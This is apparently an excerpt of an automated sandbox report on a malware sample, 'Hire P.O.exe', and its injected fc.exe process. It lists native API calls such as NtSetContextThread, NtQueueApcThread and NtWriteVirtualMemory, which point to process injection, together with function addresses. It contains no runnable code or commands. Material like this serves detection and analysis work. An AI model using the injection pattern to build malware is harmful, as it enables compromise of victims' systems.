                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01103D70 NtOpenThread,5_2_01103D70
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E04340 NtSetContextThread,LdrInitializeThunk,7_2_02E04340
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E04650 NtSuspendThread,LdrInitializeThunk,7_2_02E04650
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02AF0 NtWriteFile,LdrInitializeThunk,7_2_02E02AF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02AD0 NtReadFile,LdrInitializeThunk,7_2_02E02AD0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02BE0 NtQueryValueKey,LdrInitializeThunk,7_2_02E02BE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_02E02BF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_02E02BA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02B60 NtClose,LdrInitializeThunk,7_2_02E02B60
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02EE0 NtQueueApcThread,LdrInitializeThunk,7_2_02E02EE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_02E02E80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02FE0 NtCreateFile,LdrInitializeThunk,7_2_02E02FE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02FB0 NtResumeThread,LdrInitializeThunk,7_2_02E02FB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02F30 NtCreateSection,LdrInitializeThunk,7_2_02E02F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_02E02CA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02C60 NtCreateKey,LdrInitializeThunk,7_2_02E02C60
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_02E02C70
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_02E02DF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02DD0 NtDelayExecution,LdrInitializeThunk,7_2_02E02DD0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_02E02D30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02D10 NtMapViewOfSection,LdrInitializeThunk,7_2_02E02D10
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E035C0 NtCreateMutant,LdrInitializeThunk,7_2_02E035C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E039B0 NtGetContextThread,LdrInitializeThunk,7_2_02E039B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02AB0 NtWaitForSingleObject,7_2_02E02AB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02B80 NtQueryInformationFile,7_2_02E02B80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02EA0 NtAdjustPrivilegesToken,7_2_02E02EA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02E30 NtWriteVirtualMemory,7_2_02E02E30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02FA0 NtQuerySection,7_2_02E02FA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02F90 NtProtectVirtualMemory,7_2_02E02F90
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02F60 NtCreateProcessEx,7_2_02E02F60
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02CF0 NtOpenProcess,7_2_02E02CF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02CC0 NtQueryVirtualMemory,7_2_02E02CC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02C00 NtQueryInformationProcess,7_2_02E02C00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02DB0 NtEnumerateKey,7_2_02E02DB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E02D00 NtSetInformationFile,7_2_02E02D00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E03090 NtSetValueKey,7_2_02E03090
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E03010 NtOpenDirectoryObject,7_2_02E03010
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E03D70 NtOpenThread,7_2_02E03D70
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E03D10 NtOpenProcessToken,7_2_02E03D10
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_00519000 NtCreateFile,7_2_00519000
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_00519170 NtReadFile,7_2_00519170
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_00519260 NtDeleteFile,7_2_00519260
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_00519300 NtClose,7_2_00519300
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_00519460 NtAllocateVirtualMemory,7_2_00519460
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_028242041_2_02824204
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_02826F901_2_02826F90
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_0282DF141_2_0282DF14
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_04F100401_2_04F10040
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_04F100061_2_04F10006
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_084692701_2_08469270
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_088038581_2_08803858
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_0880BC681_2_0880BC68
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_088088981_2_08808898
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_088068981_2_08806898
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_0880384A1_2_0880384A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_08806CD01_2_08806CD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_08807F701_2_08807F70
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_088090301_2_08809030
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 1_2_088090381_2_08809038
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_004186135_2_00418613
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_004168435_2_00416843
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0041683F5_2_0041683F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_004100F35_2_004100F3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_004028A05_2_004028A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_004030B05_2_004030B0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0040E1735_2_0040E173
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0040E43E5_2_0040E43E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0042ECA35_2_0042ECA3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0040FED35_2_0040FED3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_004046D45_2_004046D4
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C01005_2_010C0100
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116A1185_2_0116A118
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011581585_2_01158158
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011901AA5_2_011901AA
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011881CC5_2_011881CC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011620005_2_01162000
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118A3525_2_0118A352
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DE3F05_2_010DE3F0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011903E65_2_011903E6
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011702745_2_01170274
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011502C05_2_011502C0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D05355_2_010D0535
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011905915_2_01190591
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011824465_2_01182446
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0117E4F65_2_0117E4F6
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F47505_2_010F4750
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D07705_2_010D0770
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CC7C05_2_010CC7C0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EC6E05_2_010EC6E0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E69625_2_010E6962
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A05_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0119A9A65_2_0119A9A6
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D28405_2_010D2840
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DA8405_2_010DA840
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B68B85_2_010B68B8
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FE8F05_2_010FE8F0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118AB405_2_0118AB40
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01186BD75_2_01186BD7
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA805_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DAD005_2_010DAD00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E8DBF5_2_010E8DBF
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CADE05_2_010CADE0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0C005_2_010D0C00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01170CB55_2_01170CB5
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0CF25_2_010C0CF2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01112F285_2_01112F28
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F0F305_2_010F0F30
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01144F405_2_01144F40
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114EFA05_2_0114EFA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C2FC85_2_010C2FC8
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DCFE05_2_010DCFE0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118EE265_2_0118EE26
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0E595_2_010D0E59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118CE935_2_0118CE93
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2E905_2_010E2E90
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118EEDB5_2_0118EEDB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0119B16B5_2_0119B16B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BF1725_2_010BF172
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110516C5_2_0110516C
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DB1B05_2_010DB1B0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D70C05_2_010D70C0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0117F0CC5_2_0117F0CC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011870E95_2_011870E9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118F0E05_2_0118F0E0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118132D5_2_0118132D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BD34C5_2_010BD34C
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0111739A5_2_0111739A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D52A05_2_010D52A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EB2C05_2_010EB2C0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011712ED5_2_011712ED
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011875715_2_01187571
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116D5B05_2_0116D5B0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118F43F5_2_0118F43F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C14605_2_010C1460
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118F7B05_2_0118F7B0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011816CC5_2_011816CC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011659105_2_01165910
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D99505_2_010D9950
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EB9505_2_010EB950
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113D8005_2_0113D800
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D38E05_2_010D38E0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118FB765_2_0118FB76
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EFB805_2_010EFB80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01145BF05_2_01145BF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110DBF95_2_0110DBF9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118FA495_2_0118FA49
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01187A465_2_01187A46
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01143A6C5_2_01143A6C
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01115AA05_2_01115AA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116DAAC5_2_0116DAAC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0117DAC65_2_0117DAC6
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01181D5A5_2_01181D5A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D3D405_2_010D3D40
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01187D735_2_01187D73
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EFDC05_2_010EFDC0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01149C325_2_01149C32
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118FCF25_2_0118FCF2
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118FF095_2_0118FF09
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D1F925_2_010D1F92
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118FFB15_2_0118FFB1
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D9EB05_2_010D9EB0
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0273235A6_2_0273235A
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0273235E6_2_0273235E
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0272B9EE6_2_0272B9EE
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_027201EF6_2_027201EF
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0274A7BE6_2_0274A7BE
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_0272BC0E6_2_0272BC0E
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exeCode function: 6_2_02729C8E6_2_02729C8E
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E502C07_2_02E502C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E702747_2_02E70274
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E903E67_2_02E903E6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DDE3F07_2_02DDE3F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8A3527_2_02E8A352
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E620007_2_02E62000
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E881CC7_2_02E881CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E901AA7_2_02E901AA
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E581587_2_02E58158
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DC01007_2_02DC0100
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E6A1187_2_02E6A118
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DEC6E07_2_02DEC6E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DCC7C07_2_02DCC7C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DF47507_2_02DF4750
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD07707_2_02DD0770
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E7E4F67_2_02E7E4F6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E824467_2_02E82446
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E744207_2_02E74420
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E905917_2_02E90591
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD05357_2_02DD0535
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DCEA807_2_02DCEA80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E86BD77_2_02E86BD7
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8AB407_2_02E8AB40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DFE8F07_2_02DFE8F0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DB68B87_2_02DB68B8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DDA8407_2_02DDA840
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD28407_2_02DD2840
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E9A9A67_2_02E9A9A6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD29A07_2_02DD29A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DE69627_2_02DE6962
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8EEDB7_2_02E8EEDB
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DE2E907_2_02DE2E90
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8CE937_2_02E8CE93
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD0E597_2_02DD0E59
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8EE267_2_02E8EE26
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DC2FC87_2_02DC2FC8
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DDCFE07_2_02DDCFE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E4EFA07_2_02E4EFA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E44F407_2_02E44F40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E12F287_2_02E12F28
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E72F307_2_02E72F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DF0F307_2_02DF0F30
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DC0CF27_2_02DC0CF2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E70CB57_2_02E70CB5
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD0C007_2_02DD0C00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DCADE07_2_02DCADE0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DE8DBF7_2_02DE8DBF
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DDAD007_2_02DDAD00
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E6CD1F7_2_02E6CD1F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E712ED7_2_02E712ED
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DEB2C07_2_02DEB2C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD52A07_2_02DD52A0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E1739A7_2_02E1739A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DBD34C7_2_02DBD34C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8132D7_2_02E8132D
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E870E97_2_02E870E9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8F0E07_2_02E8F0E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD70C07_2_02DD70C0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E7F0CC7_2_02E7F0CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DDB1B07_2_02DDB1B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E9B16B7_2_02E9B16B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E0516C7_2_02E0516C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DBF1727_2_02DBF172
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E816CC7_2_02E816CC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8F7B07_2_02E8F7B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DC14607_2_02DC1460
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8F43F7_2_02E8F43F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E6D5B07_2_02E6D5B0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E875717_2_02E87571
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E7DAC67_2_02E7DAC6
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E15AA07_2_02E15AA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E71AA37_2_02E71AA3
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E6DAAC7_2_02E6DAAC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E43A6C7_2_02E43A6C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8FA497_2_02E8FA49
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E87A467_2_02E87A46
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E45BF07_2_02E45BF0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E0DBF97_2_02E0DBF9
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DEFB807_2_02DEFB80
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8FB767_2_02E8FB76
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD38E07_2_02DD38E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E3D8007_2_02E3D800
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD99507_2_02DD9950
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DEB9507_2_02DEB950
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E659107_2_02E65910
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD9EB07_2_02DD9EB0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD1F927_2_02DD1F92
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8FFB17_2_02E8FFB1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8FF097_2_02E8FF09
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E8FCF27_2_02E8FCF2
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E49C327_2_02E49C32
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DEFDC07_2_02DEFDC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E87D737_2_02E87D73
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02DD3D407_2_02DD3D40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02E81D5A7_2_02E81D5A
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_00501C507_2_00501C50
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_004FCBA07_2_004FCBA0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_004FCDC07_2_004FCDC0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_004FAE407_2_004FAE40
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_004FB10B7_2_004FB10B
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_005052E07_2_005052E0
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_004F13A17_2_004F13A1
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_005035107_2_00503510
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0050350C7_2_0050350C
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_0051B9707_2_0051B970
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9E2BB7_2_02C9E2BB
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9038F7_2_02C9038F
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9E0387_2_02C9E038
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9E1537_2_02C9E153
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9E4EC7_2_02C9E4EC
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02C9D5B87_2_02C9D5B8
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02E3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02E05130 appears 58 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02E17E54 appears 102 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02DBB970 appears 278 times
                Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02E4F290 appears 105 times
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: String function: 0114F290 appears 105 times
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: String function: 010BB970 appears 275 times
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: String function: 01105130 appears 56 times
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: String function: 01117E54 appears 100 times
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: String function: 0113EA12 appears 86 times
